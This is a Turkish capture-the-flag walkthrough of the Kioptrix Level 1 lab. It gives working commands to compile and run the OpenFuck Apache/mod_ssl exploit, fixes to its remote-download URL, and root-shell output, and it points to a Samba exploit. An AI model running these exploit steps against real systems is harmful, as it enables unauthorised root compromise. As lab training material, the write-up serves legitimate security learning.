Boot2Root: Kioptrix Level 1

Keşif

Netdiscover bize makinanın IP adresini veriyor:

Screen Shot 2017-07-12 at 20.57.42.png

Bulunan IP adresi üzerindeki servisleri tarıyoruz:

nmap.png

Linux bir cihazda samba açık ise, enum4linux yapmazsak olmaz:

Screen Shot 2017-07-12 at 20.59.50.png

Zafiyet Analizi

Keşif safhasında bulduğumuz servis versiyonlarını inceliyoruz;

  • OpenSSH üzerinden makinaya girebileceğimiz bir exploit bulunmuyor.
  • Apache 1.3.20 ve mod_ssl 2.8.4 için OpenFuck exploiti bulunuyor.
  • Samba 2.2.1 için pek çok exploit bulunuyor.

Exploit

1. Apache üzerinden Exploit

OpenFuckV2.c exploit kodunu compile etmeye çalıştığımızda bir çok hata alıyoruz.

Screen Shot 2017-07-12 at 21.09.47.png

Hataların sebepleri ve çözümleri;

  • OpenSSL RC4 ve MD5 headerlarının olmayışı
    • #include <openssl/rc4.h>
    • #include <openssl/md5.h>
  • wget ile alınan URL’in değişmiş olması
    • Yeni URL: http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
  • libssl-dev olmaması
    • apt-get install libssl1.0-dev
  • const unsigned char yerine unsigned char kullanımı
    • Hatalı satırın “const unsigned char *p, *end;” şeklinde düzeltilmesi

Yukarıdaki hataların halledilmesinden sonra kodumuzu

“gcc -o openfuck.c openfuckv2.c -lcrypto” komutu ile compile ediyoruz ve

“./openfuck.c 0x06a <IP> -c 40” komutu ile çalıştırıyoruz:

[+] Attached to 1418
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
whoami
root

Exploiti çalıştırırken seçtiğimiz 0x06a RedHat Linux 7.2 (apache-1.3.20-16)1 anlamına gelmektedir. Exploiti komut vermeden çalıştırdığınızda gelen çıktıda detaylı bilgileri bulabilirsiniz.

2. Samba üzerinden Exploit

Samba 2.2.1a için kullanabileceğiniz pek çok exploit bulunuyor, ayrıca MSF modülü de var. Ben bunu kullanacağım: https://www.exploit-db.com/exploits/10/

Screen Shot 2017-07-12 at 21.52.15.png

Verilecek opsiyonlar için exploiti parametresiz çalıştırıp detaylı bilgilere ulaşabilirsiniz.

Flag Nerede?

Flag’in EMail olduğu vulnhub sayfasında belirtilmiş. Kısa bir araştırma sonucunda /var/mail/ içerisinde bulunanlar aşağıdaki gibi:

Screen Shot 2017-07-12 at 21.59.31.png

root harici diğerleri boş. root’u açtığımızda flag’i bulmuş ve görevimizi tamamlamış oluyoruz:

Screen Shot 2017-07-12 at 22.00.20.png

 

 

Reklamlar